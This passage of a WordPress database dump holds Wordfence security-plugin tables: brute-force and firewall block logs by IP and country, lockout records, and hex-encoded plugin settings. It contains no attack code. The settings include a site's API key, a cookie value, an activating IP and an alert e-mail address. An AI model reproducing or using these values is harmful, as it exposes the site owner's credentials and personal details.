(0x00000000000000000000ffffb956a462, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 2, 18473, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18476, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb956a462, 'TR', 1, 18484, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18452, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18460, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18479, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18482, 'brute'),
(0x00000000000000000000ffffb956a463, 'TR', 1, 18484, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18473, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18479, 'brute'),
(0x00000000000000000000ffffb956a464, 'TR', 1, 18483, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18453, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18455, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18461, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 2, 18474, 'brute'),
(0x00000000000000000000ffffb956a465, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18453, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18455, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18456, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18461, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18464, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18474, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18476, 'brute'),
(0x00000000000000000000ffffb956a466, 'TR', 1, 18481, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18457, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18460, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18461, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18466, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 1, 18479, 'brute'),
(0x00000000000000000000ffffb956a467, 'TR', 2, 18483, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18466, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18474, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18479, 'brute'),
(0x00000000000000000000ffffb956a468, 'TR', 1, 18483, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 2, 18461, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 1, 18482, 'brute'),
(0x00000000000000000000ffffb956a46a, 'TR', 1, 18484, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18452, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 2, 18456, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18460, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18474, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18476, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18477, 'brute'),
(0x00000000000000000000ffffb956a46b, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb956a46c, 'TR', 1, 18454, 'brute'),
(0x00000000000000000000ffffb956a46c, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb956a46c, 'TR', 2, 18479, 'brute'),
(0x00000000000000000000ffffb956a46d, 'TR', 1, 18460, 'brute'),
(0x00000000000000000000ffffb956a46d, 'TR', 1, 18462, 'brute'),
(0x00000000000000000000ffffb956a46d, 'TR', 1, 18464, 'brute'),
(0x00000000000000000000ffffb956a46d, 'TR', 2, 18470, 'brute'),
(0x00000000000000000000ffffb956a46d, 'TR', 1, 18481, 'brute'),
(0x00000000000000000000ffffb956a46d, 'TR', 1, 18482, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18457, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18460, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18470, 'brute'),
(0x00000000000000000000ffffb956a46e, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18455, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18457, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18467, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18470, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18471, 'brute'),
(0x00000000000000000000ffffb956a46f, 'TR', 1, 18474, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18452, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18454, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18455, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18468, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18469, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 2, 18478, 'brute'),
(0x00000000000000000000ffffb956a704, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18455, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18456, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18458, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18459, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18463, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18464, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18465, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18466, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18472, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18475, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18480, 'brute'),
(0x00000000000000000000ffffb977510b, 'TR', 1, 18483, 'brute'),
(0x00000000000000000000ffffb9d49470, 'RU', 1, 18483, 'waf'),
(0x00000000000000000000ffffb9dc64f3, 'DE', 1, 18483, 'brute'),
(0x00000000000000000000ffffb9dc64f4, 'DE', 1, 18453, 'brute'),
(0x00000000000000000000ffffb9dc64fd, 'DE', 1, 18481, 'brute'),
(0x00000000000000000000ffffb9dc6512, 'DE', 1, 18469, 'brute'),
(0x00000000000000000000ffffb9dc65c4, 'DE', 1, 18480, 'brute'),
(0x00000000000000000000ffffb9dc66f8, 'DE', 1, 18480, 'brute'),
(0x00000000000000000000ffffbaea505b, 'BR', 1, 18456, 'brute'),
(0x00000000000000000000ffffbc4425c0, 'DE', 1, 18459, 'brute'),
(0x00000000000000000000ffffbc527433, 'PT', 2, 18478, 'waf'),
(0x00000000000000000000ffffbca5c574, 'FR', 2, 18479, 'waf'),
(0x00000000000000000000ffffc0630230, 'CA', 1, 18474, 'brute'),
(0x00000000000000000000ffffc063043f, 'CA', 1, 18472, 'brute'),
(0x00000000000000000000ffffc0630ec7, 'CA', 1, 18483, 'brute'),
(0x00000000000000000000ffffc063c845, 'CA', 1, 18475, 'brute'),
(0x00000000000000000000ffffc0a3cfc8, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffffc0a9ff08, 'US', 1, 18458, 'brute'),
(0x00000000000000000000ffffc0c8d75b, 'US', 1, 18482, 'waf'),
(0x00000000000000000000ffffc146507b, 'FR', 1, 18469, 'waf'),
(0x00000000000000000000ffffc1a9fc25, 'PL', 2, 18471, 'brute'),
(0x00000000000000000000ffffc1a9fc25, 'PL', 2, 18482, 'brute'),
(0x00000000000000000000ffffc39a292a, 'FR', 1, 18463, 'brute'),
(0x00000000000000000000ffffc39a3e27, 'FR', 1, 18477, 'brute'),
(0x00000000000000000000ffffc3b00317, 'CH', 1, 18465, 'brute'),
(0x00000000000000000000ffffc60bb221, 'US', 1, 18456, 'brute'),
(0x00000000000000000000ffffc60cfabb, 'US', 1, 18476, 'brute'),
(0x00000000000000000000ffffc61b4582, 'CA', 1, 18481, 'brute'),
(0x00000000000000000000ffffca1cfa42, 'TH', 1, 18457, 'brute'),
(0x00000000000000000000ffffcebd5558, 'SG', 1, 18456, 'brute'),
(0x00000000000000000000ffffcebd809e, 'IN', 1, 18475, 'brute'),
(0x00000000000000000000ffffd06d0e66, 'US', 2, 18470, 'brute'),
(0x00000000000000000000ffffd06d368b, 'US', 1, 18457, 'brute'),
(0x00000000000000000000ffffd1362fca, 'US', 1, 18465, 'brute'),
(0x00000000000000000000ffffd4538813, 'FR', 1, 18463, 'brute'),
(0x00000000000000000000ffffd455450e, 'SE', 1, 18458, 'brute'),
(0x00000000000000000000ffffd4810332, 'FR', 1, 18468, 'brute'),
(0x00000000000000000000ffffd4812097, 'FR', 1, 18469, 'brute'),
(0x00000000000000000000ffffd4812097, 'FR', 1, 18470, 'brute'),
(0x00000000000000000000ffffd48134c6, 'FR', 1, 18469, 'brute'),
(0x00000000000000000000ffffd4813de4, 'FR', 1, 18469, 'brute'),
(0x00000000000000000000ffffd4813de4, 'FR', 1, 18470, 'brute'),
(0x00000000000000000000ffffd9a0ff5b, 'DE', 1, 18462, 'waf'),
(0x00000000000000000000ffffd9b68c75, 'FR', 1, 18458, 'brute');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfblocks7`
--

CREATE TABLE `zdenl_wfblocks7` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `type` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) UNSIGNED DEFAULT '0',
  `blockedHits` int(10) UNSIGNED DEFAULT '0',
  `expiration` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `parameters` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfblocks7`
--

INSERT INTO `zdenl_wfblocks7` (`id`, `type`, `IP`, `blockedTime`, `reason`, `lastAttempt`, `blockedHits`, `expiration`, `parameters`) VALUES
(2070, 7, 0x00000000000000000000ffff05bc3e93, 1594718052, 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', 1596030885, 109, 1599902052, NULL),
(2416, 2, 0x00000000000000000000ffffb956a467, 1596981901, 'Blocked by Wordfence Security Network', 1596981901, 1, 1596982501, NULL),
(2417, 2, 0x00000000000000000000ffffb955ef6e, 1596987998, 'Blocked by Wordfence Security Network', 1596987998, 1, 1596988598, NULL),
(2418, 2, 0x00000000000000000000ffffb9dc64f3, 1597000738, 'Blocked by Wordfence Security Network', 1597000738, 1, 1597001338, NULL),
(2419, 2, 0x00000000000000000000ffffb956a468, 1597014966, 'Blocked by Wordfence Security Network', 1597014966, 1, 1597015566, NULL),
(2420, 2, 0x00000000000000000000ffffb956a462, 1597023323, 'Blocked by Wordfence Security Network', 1597023323, 1, 1597023923, NULL),
(2421, 2, 0x00000000000000000000ffffb956a46a, 1597032709, 'Blocked by Wordfence Security Network', 1597032709, 1, 1597033309, NULL),
(2422, 2, 0x00000000000000000000ffffb2207bcc, 1597034419, 'Blocked by Wordfence Security Network', 1597034419, 1, 1597035019, NULL),
(2423, 2, 0x00000000000000000000ffffb956a463, 1597041059, 'Blocked by Wordfence Security Network', 1597041059, 1, 1597041659, NULL);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfconfig`
--

CREATE TABLE `zdenl_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfconfig`
--

INSERT INTO `zdenl_wfconfig` (`name`, `val`, `autoload`) VALUES
('activatingIP', 0x39342e3132322e3135352e313039, 'yes'),
('actUpdateInterval', 0x32, 'yes'),
('addCacheComment', 0x30, 'yes'),
('adminNoticeQueue', 0x613a303a7b7d, 'yes'),
('adminUserList', 0x613a313a7b693a313b693a313b7d, 'yes'),
('advancedCommentScanning', 0x31, 'yes'),
('ajaxWatcherDisabled_admin', 0x30, 'yes'),
('ajaxWatcherDisabled_front', 0x30, 'yes'),
('alertEmails', 0x6d76746172616d6140676d61696c2e636f6d, 'yes'),
('alertOn_adminLogin', 0x31, 'yes'),
('alertOn_block', 0x31, 'yes'),
('alertOn_breachLogin', 0x31, 'yes'),
('alertOn_firstAdminLoginOnly', 0x30, 'yes'),
('alertOn_firstNonAdminLoginOnly', 0x30, 'yes'),
('alertOn_loginLockout', 0x31, 'yes'),
('alertOn_lostPasswdForm', 0x31, 'yes'),
('alertOn_nonAdminLogin', 0x30, 'yes'),
('alertOn_scanIssues', 0x31, 'yes'),
('alertOn_severityLevel', 0x3235, 'yes'),
('alertOn_throttle', 0x30, 'yes'),
('alertOn_update', 0x30, 'yes'),
('alertOn_wafDeactivated', 0x31, 'yes'),
('alertOn_wordfenceDeactivated', 0x31, 'yes'),
('alert_maxHourly', 0x30, 'yes'),
('allowed404s', 0x2f66617669636f6e2e69636f0a2f6170706c652d746f7563682d69636f6e2a2e706e670a2f2a4032782e706e670a2f62726f77736572636f6e6669672e786d6c, 'yes'),
('allowed404s6116Migration', 0x31, 'yes'),
('allowHTTPSCaching', 0x30, 'yes'),
('allowLegacy2FA', 0x30, 'yes'),
('allowMySQLi', 0x31, 'yes'),
('allScansScheduled', 0x613a333a7b693a303b613a323a7b733a393a2274696d657374616d70223b693a313539373133393636303b733a343a2261726773223b613a313a7b693a303b693a313539373133393636303b7d7d693a313b613a323a7b733a393a2274696d657374616d70223b693a313539373339383836303b733a343a2261726773223b613a313a7b693a303b693a313539373339383836303b7d7d693a323b613a323a7b733a393a2274696d657374616d70223b693a313539373635383036303b733a343a2261726773223b613a313a7b693a303b693a313539373635383036303b7d7d7d, 'yes'),
('apiKey', 0x65356164323137643232386630396230636537626563316266316265633464326130306165303963653962623738343462653763623066613834333332383835323431656639633238616439613739393034316139343035626233646262653836666466333230643366636139623632363735613735613061336130336663653238653666306632616363373761343762616130313730346464383831346264, 'yes'),
('autoBlockScanners', 0x31, 'yes'),
('autoUpdate', 0x31, 'yes'),
('autoUpdateAttempts', 0x30, 'yes'),
('autoUpdateChoice', 0x31, 'yes'),
('bannedURLs', '', 'yes'),
('betaThreatDefenseFeed', 0x30, 'yes'),
('blockCustomText', '', 'yes'),
('blockedTime', 0x333030, 'yes'),
('blockFakeBots', 0x30, 'yes'),
('blocks702Migration', 0x31, 'yes'),
('cacheType', 0x64697361626c6564, 'yes'),
('cbl_action', 0x626c6f636b, 'yes'),
('cbl_bypassRedirDest', '', 'yes'),
('cbl_bypassRedirURL', '', 'yes'),
('cbl_bypassViewURL', '', 'yes'),
('cbl_cookieVal', 0x35653431356431613137633662, 'yes'),
('cbl_loggedInBlocked', '', 'yes'),
('cbl_redirURL', '', 'yes'),
('cbl_restOfSiteBlocked', 0x31, 'yes'),
('checkSpamIP', 0x31, 'yes'),
('config701Migration', 0x31, 'yes'),
('config720Migration', 0x31, 'yes');
INSERT INTO `zdenl_wfconfig` (`name`, `val`, `autoload`) VALUES
('coreHashes', 0x1f8b0800000000000003001c80e37f613a323a7b733a343a2268617368223b733a36343a2234653763303766303064336437613461353430636535363234653330306130316364356136623537353461343737663461336439336261363633626533366333223b733a363a22686173686573223b733a3132373631363a220006ad88eb5737878eb1687423931f09b29a71a1bb29a4ba64c5e8fa2400d0c90028d0129c98fa5a15fa59f7599840e04971a915ee9bc89723e1d154bbe1f9400034df97bc749d825c1076a651e7fcdeb91ebef4275fcbe1c2616a78cad2a6db00453d6ab683cbc88b7c9d70382ee60ec2bdfff705cbd6a4f1f353174770e583004571ad78bf8394c35061a788f73e6276e144aabf6f34568a473b613c06b1de005e4e9dd9e5bc9861f0651f7c4ba0b72d05e0c6dcb0d2cd1f1cc99c143de78400629c26469ef698b3ff257c779bed2a51723b90077c2f8a3d2841a7f3e43cfc008591a523e642ed35e001bf146a86f32423f5e06a219fb5fed0624e80f46af60090dba7ffe534281511ca4ba0497c8a84af300f0cbaecb57118442e5ebe76af009d3e7ce6053b28dfaf5c572a9c373f8cf60b0ad84eaac1323dc337105b556f00b5eb690ce4d3d6849d0f1322de07fbe3c65dd15ee8b015fe5844fe93325d2800b987f62f8ca16f2911f6f43a345db1e35f15c70ff8df2bcc94eb8e63bdfed700d4651eb52aeb40927484c0b10e22e990e1837109c8904efe159235f78448a500ed547ccc855facd553f238adb4174f0630cebcaac2b830aac30eaa89361b9500f7f92d6273e847a80a2868721a0f2ef36ee510f5f92165c8d77a2e59111078010380d755cf690c8dcd3547a0e81c14dc2450c2fc75cd768f411154148991c0010fcaa644b649e85856aa66b845577fa313cf659380df47a75db8f117b4711b01293697ed09c56adc01ed94f56e4ed8a45e7d305b509c4b58087393a42bc8890161b177a95382b6e0135bf30255607c5753b35044e6b0131ee7be9f4e68acc801620221951d0517c6f2ad23a73869df3e6b7136bf528445ff359e943a9722fc0185b4cfb184e7b75415aa5f5e6779aa7a47824c2231b0fbb38d557d363a0f9f019f6c7c1d87ec2806e39ca6c19671067b12c6f056c07e1c75ea3ca20644680801a66f2abfaf8c63cfac30dff1cec1781da2636c24870912119934dadd6d95b701e4c9f86fbebf601d76413aa711f89914ec88607b7266cbc1ef5ffb5333192f0201738dd96dda3f649a5ecd9430df5830e31323719605c22d6d6ccf012a80cf022354f18c6399c178f045b5c7c28379ee88c5a99ce2489c15e0f7ee3ecce3160224c93210fee48e5de29225c6ec2a9c361d1bde5cfe6470f9db9b219dbd187302259fe05d5ad759c76fe58addbf9ffe9fa584a991f4c9723b47d0f711228aa5024775f7c9df26c3775dea2d48800d1f5257fdbd5ccc35f5a6f5f227b38c3dc3025180376169cc0d4943d27045964be1c8ccf08779bd806b8ad1a97dcba3069c025c8d24ad7022b726cc702b5e8407bad51af57ba9af8edbccc298b935ff7c990266a2e3b58553cd044c9a6f173345fd78c0bafdd1a55518e3ff0fb071a8608e02713475ed0bb6f85aa2aeb9f0b0af5b6e181ef938947f031805174fa3ec723702870b08cd301848301431594c2452521f41680b4a36b4e74da6773a2ff00e37029a2ecada8f5094c183682e0b42c2552d13d197f2271e5473c1aa7a2b70bf9002df4dfa06cbbb79554ca485c14bab0cf943cb57618fe55cb0e8cb81c40a833b02e8a530e5c4a02266ab05d090ce9fefd2270dcd8da4fd44c4644dc5d7d9f9c302f7a71d73cbc7bf89d8dab4f8192432f46a29c32c0ab227201f2336e4a7390a02fc8d87cf02da96a9f56d4bd832860f65b266e90b7465be34f99c9a081af003031147472ec06607adb15679601bb8c9ff29222e6f5b60d7cf90dd0d061bc914031c6e94f3e76a6ebc7669550a402c9b2b212575091b72650634d92b4a755024032c96574e8dd950d932d222c59e982c7c5ee2e58079deb2f0f1f22f1a2841b003315dfc2fc685ad42914df36a3aade540d1abc8472b53db66b617baabffb96403569e69891c0a02b03657b715fa05d4915c3ce74f0ccc456a32ac51f28ad7d603940dc07cfe5836c2ecd4eed22f3436a44af2d5c93fd4d5e658924758867e86039675999ffa6903630de270aaabf5b4fb1151d6c71913ed999cbdf70c0d3f6303984cd954d38a95f9ee71671502a6c8ab3f1d63019772870ec8b8a674ad036403aeace6420d544ac22c5193d3249a54446806d71df10b15d028285a64178f7a03b6b9764fffafafc25f95029f083bc6809bb3458c7059f62ed5267df606ba5f03ba09d45190bfc6161281898de36f53e26e6efbccb5761feaf80029b0f6ccd303bf96ddd3a4e5063a44494c56ad0b0079c55a08fe0f88299bbe4b890a11e38503cb1d01dc98448b7e121099892506526ff8ef63118915d637ae7f0da6ba4cbb03e63e318a16dd885d9a155e5dac52c9a2124e46994df4e24acc2c98eff70c6903ea492e32209abb193e31b75ad83bd7a8be8231161ed481249a1021a187573a0409a85378ef4471357fbae02f77ba1701db5f573a9cd82b011c66f0317af9b8040f67a2a68b5c59f2fae26df50c78b3471f4f30c7cee26a0e6f5d2ee396bdae0410429c3dbd660e7e3a4ebecc1ea4466136a2d5a1d90a59208dd8d327bae8690411fbc2e72bad600cadc2664759626d9fef5550a9994d81994ae9daa1308026044376c2e84d932485db07e8fa11b64fbdb7342d4b1bb8090b6f36db6c62f631044513e53bb13778f93f1cf02d99c7b18ca85ade7a45bb9f892a866e6bb1bb890445d76d1040ec0c9ee3e9f68e01e9f0311073aead5995233124d015e91aa33d044998888a9dbf0762a38e584272bd3f8ab7ec10cda52df48221c769ba3e7fa10460c9e55d7742cbf9cebaf59d406b7026bb9bb96834d49b1eb532b68f997fba046627f647d1d3cf4953950ce67da07d52e2a58517fd0e4ad09b0e5a5b60c6f6046da6ff4994243d0b84adf9bcb944938bd69b26c4c7be4007902bd5a2cb14d0047a3dac69bb0feaeed2201c53f2a81fb0d4c0fd1a1a34dab631e935c1aac7320492330d233f45c95110b7cbd84cb6d5496d24cf5acae5aa421aef2184e39c26049a08cd968e1f97436b8660378bcfd7272fb9bd5de469aab213351da000bcd204d6ce2525d6ec2dd308d5295e5c8189a2001bab7460966b90e0b240a7839b5504e64fc594a46370a6cf3ee32138484236a5cfe0e3ece23d9362f1c2158921a704f46e8a7a00a74f5311137e4b0feaf8e77c24d8ebf6b054a1ecefc185e66c4a050cc6f81262ff124f779f90e0d0e1cd660a54c0feb2ad45671a55ea0df89fa305148f6c7be003b253171f59443749d52e0b60e8e4b5c38f7d23d9a7fe9ef44a054b4ea28d65e9d38c04bbf026149dc2d08e75d1a1490e719974bcb78b6e0b7e05540902025f6ad7068d2d989b86c925b3a63f9e37a1306996bbcb7dcd65dd69055a10d64f992645062b72588e0f6506907b65aabd6d58cec8f63cbc3aa64b53057a5f6f65efd51efdc5ad79a75e102f3f683b407204e24b12141425e0e14c500585c766a8e063cb287cd55f5da0db55cccd926f1e7e4d45ffe8efd71b1386dd05b41d73e883f2405a325d10a6f3ba69bea80ca85d284a0f7e6ef833ece0cf9d05bfd9801f81686a81f371da6fd132b1866b4cfd9b4a51a76300cf387c7f56dc05cb4191fcfd8a1f8e4e08dabab6290dc26de44d0641bccce644beb06f732c9605d5f0ea24bb8bf4674a09e1c596d8376c7d0ed861a1f1bed4c8c18aafc3777c05db6719524c680621f6b08131d25213f3fe9d26112798fd6bb11b44273a385905dfa4271c5c16d500a8b6af7cc738cd28b405885d78925ae41916b4cf764a2b05e87e8653198924d98b3608cfee76679041d19cc008ca8b513fad6aac604a9305f1a94ef55dee302696f105629b001deb563f39b4c1ba14b6d122ad2ef7493305f491327229726b922b60bd4e694de7f132025d3cbe09be68040adacba58d9705fe4fed0b80330e8c35469ed0c85ccc0011f79ef0932c167653e7e70e2b701c060afd2e871ba799e9b40dc44a2a525409fc218ce6412696d51055f342cd744706163d5f3a1c5cea5d3e699fa33fceb740dab9dc614bd5ba15da2abfa0d4bd2b06185db280b5d2ae67c6895e3632f31c47a69e0d831f1253a01907850c7cb13b0629a5243d5803c16e21c310baae826c3dd840f541cd1918b0d3f1183ade5635063655c6fe7835f41250789b9bcd26f3bf3a0e569356e6fbda2d711358b9ea41063901c04de734dee0862db2b090a9747f0a7bebd1f5867d1eff4d491e060905064145304ee3f6dccafbb584c52e5430180362285bce17b281dc0e9eaaa3f5ed066f5964d4ce25dc20e52ba35bbb42ba9512f020661bb6083c33297c959e9f1b06792daf6482b0b4caf45d602c3586ef1f6c391304846fc81fb9a478ab9c3b910688f5be785a9fa0d57140c9f5b6e4353161a514497888bbbc4d4f59c055f20d068b5aea748a4bcfade9754a4f79c5b9a226d2b8f8c42aeb91dcb2c675732391069e1c087431f01fb22334e7cdf6b4c3e482b90e1a80c12726dd0638d100c31706aa94bff59b6d393b3ae103c4cdbc8466c2c66684299399a40749ef9cb3cd3b06c112fe506f69c3e3a7da3d9044e18eafe4a430536ced687367dcba7b942c9806f396d5c96099806888ff609350a18f2acda4b9216a316d21967e9d054aad8e070da64fd35d058e0781593c8d79178c7d831abb3ec9ba48a8aff0497cdcc750070ff4e8b1dfe8aee04262a5bd65d45efc9ace883b565431a8ce636aa85d206b071c5e01a74fd7eaa439ab41399d2fd81af38c1625984062a42e8c60bbf0959a072004706fd6c0ef6466b9c63f0cbb6a72a3e459e5158f657cd5488cf7683edd072c8b651563de17a196521817fa657335042d939ae0443dc7c4fb3cf3da3a0c0733e3cdcfa9914de7f19dd43ebb1c8bff72ee0f36cbd4a4d0f4257a8b75db870737fe7f7dbb46cbf098c45b7978b1af5d6b04e1c6ddadf759728387d615bc030739a349562c430e328d229395c9560f1fd16cb79770885d6c32a21750eff866073eecf5044b70d4c701d69a4a94be99627677b060eea902aab52abb77e9a0f3077db1cbf8a9b62aca98f10f98293e3283711da4966513a5805e0fd5c0298c500792038d11a6c76efb476652f4404f6c2c3e6976c43ab060c47451c62ab7382707a53c93f30ae38bc10592bca04af21e8fb73b934860f751d89d1d367018197107beffd861f325ebaef1080d86d80910fcec2211851f4118906e883348d8497307cc3a59a5a461c165301042d2b279f55070160aefadbeafa899f20bc621ce9b07cdffbbd926b0d6c985274dbad034e39a429f53f8dfc92b27a534261cbc240307d8a1a10ff35606670e6704a4e113106fce1efc67107ed90beb106d2fe0a11c08122f26742be47ff9e273d77fec1cbee4d422233a5aabdcaf34e39389265f150826dbc70e01c736227846f07c7760411b5a5f2b764c0d7db08e4edf50e5c9e6083683abb88abda25feb04f0d2b0e6ddbe94fd6c321fa1629ea9b97113c39c2408558476a1f1096c2c73a8c5d9220d0efb6d039ee860bbe159d793af5594b658085e9e4d0373f7970f8d36529f4840f116092689e586bea41342c7789ef6406408c65210022355b3f44ffe50679b9e731e48fc6fe810296ed5ceff577213e98108ce748f5aec4daad2fee83f012586efb91b880f56fa1d18dcc0a244b1b0467608e01f40af88c1fcdc2a391f56150b9bbb0e8ccebcf3125b45a3b642757d3ca808ee84b11c1a23b664b8341b2afb3f0b989ce5b864aa515d0442782e7c3944f808f63a0e6840d6c251ffcf2f55002d7c5fdba231f9670b2df12bb419adb7de7d08fcd498215e6942b3d0f24afcd55c57a47f5d9066a71b9c40034085771ba33d092e1b185db619ed6b5a3114d1996d16d247f582fd5dd41278e03003f8ea95c909313422319c4978aaf547194ca65b0995821db1163e2847e1413a108c0efdc7093634b513ae88e720b932061011444dc84de224cb0de6be90699300d401ac8b09385cc5ace7ae6af9419281ca9435d12b589d0cad9c6f885415f96db05f037c094debb0ec127975249c31bc636b5f914b17ff6fdd66dbcf046db31c85b925fb0967295b2e89720ae06f9469d77b348a9b510a0d1438488c0d665812f0c0e8040976b66cbbb4f5d9aedff7062118ff16f0b9ff5080b26dfdf8950a367ccf944b097ed0f543e8c8ab990eaf37a406e0c33ac0a3732675cbe4d908ec816ad4cb7409a92b13f67b52f483e